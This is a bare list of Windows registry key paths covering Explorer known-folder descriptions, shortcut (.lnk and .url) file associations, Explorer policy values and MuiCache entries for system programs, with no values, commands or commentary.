                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Stream

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PublishExpandedPath

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Attributes

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\FolderTypeID

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InitFolderHandler

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PropertyBag

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Category

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Name

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParentFolder

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Description

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\RelativePath

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParsingName

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InfoTip

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalizedName

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Icon

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Security

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResource

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResourceType

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalRedirectOnly

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Roamable

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PreCreate

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Stream

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PublishExpandedPath

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Attributes

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\FolderTypeID

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InitFolderHandler

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PropertyBag

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions

                
                HKEY_CLASSES_ROOT\.lnk

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.lnk\(Default)

                
                HKEY_CLASSES_ROOT\.lnk\OpenWithProgids

                
                HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lnk\OpenWithProgids

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lnk

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lnk\

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lnk\UserChoice

                
                HKEY_CLASSES_ROOT\lnkfile

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\CurVer

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\ShellEx\IconHandler

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\shellex\IconHandler\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\DocObject

                
                HKEY_CLASSES_ROOT\SystemFileAssociations\.lnk

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.lnk\DocObject

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\BrowseInPlace

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.lnk\BrowseInPlace

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.lnk\Content Type

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\Clsid

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\CLSID\(Default)

                
                HKEY_CLASSES_ROOT\CLSID\{00021401-0000-0000-C000-000000000046}\Implemented Categories\{00021490-0000-0000-C000-000000000046}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\IsShortcut

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\AlwaysShowExt

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.lnk\AlwaysShowExt

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\NeverShowExt

                
                HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MUI\StringCacheSettings

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings\StringCacheGeneration

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\LanguageList

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\System32\ie4uinit.exe,-731

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\AccessibilityCpl.dll,-10

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\System32\ie4uinit.exe,-737

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Category

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Name

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\ParentFolder

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Description

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\RelativePath

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\ParsingName

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\InfoTip

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\LocalizedName

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Icon

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Security

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\StreamResource

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\StreamResourceType

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\LocalRedirectOnly

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Roamable

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\PreCreate

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Stream

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\PublishExpandedPath

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Attributes

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\FolderTypeID

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\InitFolderHandler

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\PropertyBag

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Programs

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuSubFolders

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuSubFolders

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Category

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Name

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\ParentFolder

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Description

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\RelativePath

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\ParsingName

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\InfoTip

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\LocalizedName

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Icon

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Security

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\StreamResource

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\StreamResourceType

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\LocalRedirectOnly

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Roamable

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PreCreate

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Stream

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PublishExpandedPath

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Attributes

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\FolderTypeID

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\InitFolderHandler

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PropertyBag

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Start Menu

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\sud.dll,-1

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\wucltux.dll,-1

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\ehome\ehres.dll,-100

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Program Files\Windows Sidebar\sidebar.exe,-1005

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\WindowsAnytimeUpgradeUI.exe,-1

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Program Files\DVD Maker\DVDMaker.exe,-61403

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\FXSRESM.dll,-114

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\unregmp2.exe,-4

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\XpsRchVw.exe,-102

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\displayswitch.exe,-320

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Program Files\Common Files\Microsoft Shared\Ink\mip.exe,-291

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\mblctr.exe,-1008

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\NetProjW.dll,-501

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\mstsc.exe,-4000

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\SnippingTool.exe,-15051

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\SoundRecorder.exe,-100

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\SNTSearch.dll,-505

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\System32\SyncCenter.dll,-3000

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\OobeFldr.dll,-33056

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\Speech\SpeechUX\sapi.cpl,-5555

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\dfrgui.exe,-103

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\wdc.dll,-10030

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\msinfo32.exe,-100

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\rstrui.exe,-100

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\miguiresource.dll,-201

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\migwiz\wet.dll,-591

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\migwiz\wet.dll,-588

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe,-102

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe,-101

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\comres.dll,-3410

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\mycomput.dll,-300

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\odbcint.dll,-1310

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\miguiresource.dll,-101

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\iscsicpl.dll,-5001

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\MdSched.exe,-4001

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\wdc.dll,-10021

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\pmcsnap.dll,-700

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\wsecedit.dll,-718

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\filemgmt.dll,-2204

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\msconfig.exe,-126

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\System32\AuthFWGP.dll,-20

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\gameux.dll,-10082

                
                HKEY_CLASSES_ROOT\.url

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.URL\(Default)

                
                HKEY_CLASSES_ROOT\.url\OpenWithProgids

                
                HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.url\OpenWithProgids

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.url

                
                HKEY_CLASSES_ROOT\InternetShortcut

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\CurVer

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\ShellEx\IconHandler

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\ShellEx\IconHandler\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\DocObject

                
                HKEY_CLASSES_ROOT\SystemFileAssociations\.url

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.URL\PerceivedType

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\BrowseInPlace

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.URL\Content Type

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\Clsid

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\CLSID\(Default)

                
                HKEY_CLASSES_ROOT\CLSID\{FBF23B40-E3F0-101B-8488-00AA003E56F8}\Implemented Categories\{00021490-0000-0000-C000-000000000046}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\IsShortcut

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\AlwaysShowExt

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\NeverShowExt

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\sdcpl.dll,-101

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\recdisc.exe,-2000

                
                HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\msra.exe,-100

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Category

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Name

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\ParentFolder

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Description

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\RelativePath

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\ParsingName

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\InfoTip

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\LocalizedName

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Icon

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Security

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\StreamResource

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\StreamResourceType

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\LocalRedirectOnly

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Roamable

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\PreCreate

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Stream

                
